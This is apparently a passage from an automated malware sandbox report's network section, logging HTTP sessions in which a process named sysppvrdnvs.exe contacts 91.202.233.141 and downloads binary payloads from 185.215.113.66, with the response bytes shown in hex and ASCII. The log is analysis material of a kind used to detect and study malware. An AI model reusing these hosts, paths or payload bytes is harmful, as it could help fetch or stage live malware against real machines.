                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                            Oct 26, 2024 07:27:24.706722021 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 91.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:24.999893904 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:24 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                            Oct 26, 2024 07:27:27.098504066 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 91.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:27.434320927 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:27 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                            Oct 26, 2024 07:27:29.456048965 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 91.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:29.749228001 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:29 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            11192.168.2.650000185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:32.914791107 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848124027 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:33 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 110600
                                                                                                                                                                                            Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "66f3a94a-1b008"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                                                                            Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848284960 CEST112INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                                                            Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848318100 CEST1236INData Raw: df 50 5e 7f 28 4b 33 04 b4 3a a9 20 79 58 ed e3 8d 4d 5e 67 51 44 02 be a3 81 02 86 c9 f0 14 35 97 13 d9 96 cd e0 8c 35 1e b0 21 48 c2 e1 c2 46 e2 3f 1f af 7d 27 2b bf d5 57 0d 78 72 8d 70 c8 38 de 55 5f 48 89 81 a8 19 d0 bc 93 4b 5c e0 ff b8 c2
                                                                                                                                                                                            Data Ascii: P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu BUHj{y0mlU"3S+I)~5DX#o&n3_$by<DLy/9o-T&ge1c80G~q!&
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848352909 CEST212INData Raw: 0c 17 99 f2 dc 4c 43 4c 1b 74 a4 2e 3b 7f 13 7b 31 10 68 ce 33 5d c9 ef c7 81 17 80 74 c1 fc 96 e6 99 a0 cf 08 de f9 ef c7 af b3 99 89 2e b0 c0 b8 e1 91 45 69 65 c0 5c 3f 1f 96 c7 05 7c c3 36 20 3a d9 99 20 a3 04 33 c0 2b cd 06 60 f3 53 fd 82 9c
                                                                                                                                                                                            Data Ascii: LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a$@bWEgU4LlLAq5;z#@M8id8[y7*pZN$S<[
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848387957 CEST1236INData Raw: fd 09 89 5a 84 98 ec 92 38 14 38 9c dd f9 b0 cb 41 ff 0b 97 6c 35 72 36 dd 5e 39 43 6b 6f 2b 40 c0 62 a9 0a 14 6b cb 24 3e 40 7c 23 d8 7d 5f 93 86 58 6b f8 d5 ed 16 bc f4 89 0f c2 d0 be 65 11 94 e8 c5 09 54 92 6c db a5 cf ff b7 18 b7 7e c2 a5 87
                                                                                                                                                                                            Data Ascii: Z88Al5r6^9Cko+@bk$>@|#}_XkeTl~Kyyx.d;XbbE7PF-Pedz}F M1VDg~y%E*KsE"9a<5!bM+P14%Wc=9(R$ti+U:YyMdlO8
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848438978 CEST212INData Raw: b3 9a d4 43 6a e4 f2 75 97 0c 0b 1d f5 a2 e6 ca 87 f3 9f 2e 7f 2c f3 b9 08 6a 41 ba db af 20 e9 e2 b7 95 be 45 10 38 78 59 38 68 e6 91 4c ab 89 0a 4a 50 69 af 16 7c 4b 8c 1e ad b2 11 f5 6c d5 33 a8 b6 4b 4b 9b 3f e5 d7 4f 0d 8c cc 6e 56 26 e2 b9
                                                                                                                                                                                            Data Ascii: Cju.,jA E8xY8hLJPi|Kl3KK?OnV& KyL1d6Y0m~ ?LOR9.0Ddr(dL]VcX/N=kT,f\&Kk~DMub;/G
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848474979 CEST1148INData Raw: 66 25 41 17 26 ff 90 a7 a4 94 3e bb 82 c0 74 68 f0 c3 9a 57 5a 9a 71 d4 2e 18 25 3f 21 ab fe ed 55 73 9b 2e 20 81 d7 ae c6 7c 76 d6 92 86 34 1a 33 80 84 40 dd 5e e0 fb cb c1 6b a3 fe 23 bb 66 d7 cd a1 6b ca dc ce 88 31 f2 a7 07 27 98 26 17 62 7e
                                                                                                                                                                                            Data Ascii: f%A&>thWZq.%?!Us. |v43@^k#fk1'&b~iV@|,,@|Pc('"NT3U?A}?m_>smVmm74tMZS-GJ0RCw\FP&_+[2`,#:
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848510027 CEST1236INData Raw: 9a 3d 1a cb 65 63 99 e9 ec 2a ec 6a 74 27 b6 34 e7 e0 38 9c 1f bd 84 c7 dd 5d 7e e8 48 a4 d8 f8 44 7b 6e a3 ed a1 ad 86 a6 86 56 bb 53 ac a1 28 d7 bd 27 4d a3 8f fc 96 cd 1b 45 18 db 7b b1 2c 9c 60 20 ba 19 27 f9 33 04 09 cf 97 a0 29 74 a8 c0 b0
                                                                                                                                                                                            Data Ascii: =ec*jt'48]~HD{nVS('ME{,` '3)t#Av@:VtVBD8^e`,idHd8H0"_]>4]23BIZ?[LxIX~$"dT~4PDKy\MI8kgy$"?
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848539114 CEST212INData Raw: d7 7a 67 28 d6 c6 01 2c 3d 2d 4c 98 3c d5 c2 bb 7a 20 67 e8 b5 c8 62 12 bb 0d be 5d 6b 63 d5 b8 d9 cf 76 b6 d5 53 0e c0 5d f2 84 03 26 79 78 c2 d4 60 35 9c 49 80 8e d5 5d c1 e3 7c 99 ec aa e5 5c ae dd a7 55 39 f2 15 94 88 7c 03 9b 18 96 55 32 7d
                                                                                                                                                                                            Data Ascii: zg(,=-L<z gb]kcvS]&yx`5I]|\U9|U2}!#m<R122do*z:=J-VmM[':50oNn_:Os}^~sH.Idu#}HRz"EnyT/*
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848572969 CEST1236INData Raw: c5 ff 56 13 f0 5c 33 a0 fa f0 c9 91 56 2a da 57 b1 a0 5d 31 60 98 d3 80 b8 e2 b1 91 0e f9 69 77 b0 36 6d 2a b7 40 06 cd 49 fc 0a 65 10 10 22 09 6f 15 d8 e2 dd b0 55 6c ef 2a 23 5e f3 72 aa 97 53 5a ca 74 a9 6b 83 92 91 2e 5b b8 de 95 44 f7 17 ea
                                                                                                                                                                                            Data Ascii: V\3V*W]1`iw6m*@Ie"oUl*#^rSZtk.[D`i!A&\NtYJ@xi}S6s@%e i$+'JccC{d,;HGj("IMHM;"C*@=
                                                                                                                                                                                            Oct 26, 2024 07:27:33.854101896 CEST1236INData Raw: d2 bd 6a 4f b3 f3 04 fd dc 8f 4f 96 d4 d9 78 d6 71 22 12 a0 26 ee 4c 98 92 fa 8b f7 60 62 d2 48 5b 9c 20 f3 ab a1 00 23 51 da cb 45 93 a3 0b c0 aa 32 dc 5d 20 9b af 53 0c de 0c 96 80 4e 52 82 a5 e3 34 73 ce 83 78 32 e8 77 f0 e5 9c fd 79 ba 01 1c
                                                                                                                                                                                            Data Ascii: jOOxq"&L`bH[ #QE2] SNR4sx2wyHqDFA/ga:{X>O!{\o9P-\ g(y1EGK9/pvAyNbgZF'%V[X$x7Z'Owa5hhyX&1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            12192.168.2.650001185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:35.884700060 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812014103 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:36 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 8960
                                                                                                                                                                                            Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "671230ee-2300"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812073946 CEST1236INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                                                            Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812087059 CEST424INData Raw: 25 31 0a 68 9c d8 ba 48 4c 90 81 b7 28 74 68 c8 16 f9 b8 2a c6 90 b0 6c 31 39 f2 bf 87 64 53 3a 32 36 df 01 fc e5 9e 18 72 19 69 e2 c7 ef 65 32 01 84 09 84 3b 94 85 f3 13 25 da 52 6f 20 19 c5 d9 dd d1 da 08 6e 35 b4 1e 41 c3 9d d9 91 9f 3f 3a 82
                                                                                                                                                                                            Data Ascii: %1hHL(th*l19dS:26rie2;%Ro n5A?:p"~ B'P?:/B1%yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)W
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812099934 CEST1236INData Raw: 1b 49 f7 8a fd 79 6e dc 1e bc c9 15 68 4a 7c 6b 88 9e f6 d1 3b 4f ec fa a2 85 54 ef 0a 00 f3 76 83 92 c6 6d c1 6b 97 40 dd 35 48 d7 f8 64 1e f7 cc ed 74 03 72 be 68 20 16 a4 ee 0b e1 7f 53 dd f1 ab 5e 7f 99 d8 ee 4c e7 a7 08 4f 10 08 bf 26 1f b5
                                                                                                                                                                                            Data Ascii: IynhJ|k;OTvmk@5Hdtrh S^LO&,8_\KA0VIMF&n;B!]U~1&w\TU~y&n()ft2o9YG1>TuOIZLz9iB8"O*7ys8I]!?)V}Iv
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812112093 CEST1236INData Raw: 05 a9 18 6c fe 42 37 2d 2a 59 74 3b 7c 72 a6 7f bc 53 8f 84 17 e1 ce b6 df 7b 2e cc fe ad d3 67 94 ad 64 94 17 66 6f 77 a9 25 e8 c6 95 fc 04 66 2e e7 d9 ff 74 17 04 8d 99 42 fd a1 f8 96 48 a0 81 7b c7 3a 1b 42 00 df a2 0f ff 61 7b c9 c1 25 fd ba
                                                                                                                                                                                            Data Ascii: lB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ*{s`#UWr|Df~Y:<@c?-G+TfV6[_lCQh!UXs{m`/c3KS
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812123060 CEST24INData Raw: 65 50 e5 64 b8 74 ba 6e 71 60 59 36 47 34 c4 89 40 bc 81 34 47 fe 22 ff
                                                                                                                                                                                            Data Ascii: ePdtnq`Y6G4@4G"
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812194109 CEST1236INData Raw: eb 45 4c 97 ef 2a 1d 2d 9e 44 a8 12 24 dd 16 68 4f 59 12 bf 43 b3 04 4d 19 04 15 bf 01 95 74 9f 14 3b 45 eb f3 d9 62 da 79 9d 16 ba d9 cc d4 f6 3b 74 51 be 85 05 66 0a 71 89 56 7b 23 ef 62 eb 74 a4 a1 98 46 d2 dd b1 ee e3 47 91 89 f2 99 71 dc c6
                                                                                                                                                                                            Data Ascii: EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO1>v@O;KbSs YUN7L'A4Ht\is
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812206984 CEST1236INData Raw: 44 69 97 04 49 86 d7 b5 59 b2 c1 bc a6 6a 60 69 c7 d9 b8 01 f1 03 06 0d 0c b0 fc aa 40 67 6e cf 94 4b 3d fa 20 12 1c 7b e4 0b 90 7d 37 06 4e 57 b1 53 8d e6 1f 43 0a 22 07 24 10 5a 1b cc 5e 22 4c 64 d0 cf 28 1b 24 a8 fd 5d 0e a7 38 e6 2c 0c cf cb
                                                                                                                                                                                            Data Ascii: DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1!FWy7JKPh,2W>>{]t4iUaAIdBJ+:O"
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812218904 CEST1236INData Raw: 35 cc 98 17 45 ee fe 11 2f 11 f1 a7 11 08 7a 36 51 5b b6 a4 0e 15 e5 4f 37 a2 fb 50 32 88 95 be 22 83 f8 5b e1 64 e4 26 6d 00 c2 f9 4d d2 e9 39 54 4c 7c cb b9 79 ca fe 4c 17 8d 93 22 88 09 b9 f5 c4 36 45 30 a8 2c c4 29 da af 3d 55 db 50 b9 bd 72
                                                                                                                                                                                            Data Ascii: 5E/z6Q[O7P2"[d&mM9TL|yL"6E0,)=UPr4;2JaQ{f8-{=i,JHy +9Oq;;=`}>b2[6R+6w|Ajc,{2.dEp,YsEn8W!A2Ou`H0w.z+Vj2W7r5HQ
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812236071 CEST124INData Raw: d0 b8 b8 a4 7a f1 78 a6 de a0 98 fd d5 94 21 bb 17 c0 a8 30 d8 8a ec e3 68 e4 92 ee fd a2 e1 0f 48 24 3b bd 86 96 39 f7 ff d2 03 60 b8 c4 c9 a9 36 ad c1 5c 28 3c f3 9d ac d2 56 a1 15 36 37 e1 45 39 05 02 82 2f aa 3a 6a 3b 9e 3e 7c 57 a3 17 b7 f3
                                                                                                                                                                                            Data Ascii: zx!0hH$;9`6\(<V67E9/:j;>|Wk<cb4Gcap`%SmttII@i


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            13192.168.2.650004185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:39.062304020 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:40.163943052 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:39 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 16128
                                                                                                                                                                                            Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT
